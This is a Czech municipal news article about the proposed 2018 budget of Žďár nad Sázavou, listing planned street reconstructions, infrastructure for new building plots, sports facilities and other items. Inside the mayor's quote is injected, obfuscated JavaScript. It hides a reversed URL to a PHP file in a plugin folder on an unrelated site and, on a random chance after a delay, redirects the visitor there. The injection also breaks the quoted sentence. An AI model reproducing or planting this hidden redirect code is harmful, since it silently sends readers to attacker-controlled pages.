Rainbow page separator

V rozpočtu budou figurovat také náklady na rekonstrukce ulic

Pátek, 24. listopadu 2017

Peníze, papírové bankovky

Žďár nad Sázavou / Pokračování budování infrastruktury pro další stavební parcely na Klafaru, rekonstrukce ulice Alšova ve čtvrti Vodojem či spoluúčast na rekonstrukci vodovodních a kanalizačních rozvodů a rovněž nové povrchy v ulicích V Lískách, Na Úvoze a K Přehradě na Vysočanech, pokračování výstavby zázemí pro fotbal a tenis, revitalizace zeleně ve Stržanově, opravy dětských hřišť či výkupy dalších pozemků. To jsou zatím jenom některé položky, které by se měly objevit v rozpočtu Žďáru na příští rok.
„V návrhu rozpočtu nejsou zaneseny akce podmíněné získáním dotace, k [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu by došlo až ve chvíli, kdy budeme mít v ruce rozhodnutí, že jsme uspěli,“ poznamenal starosta Žďáru nad Sázavou Zdeněk Navrátil.
Návrh rozpočtu pro rok 2018 postupně prochází úpravami, zastupitelé jej budou schvalovat při svém zasedání 14. prosince.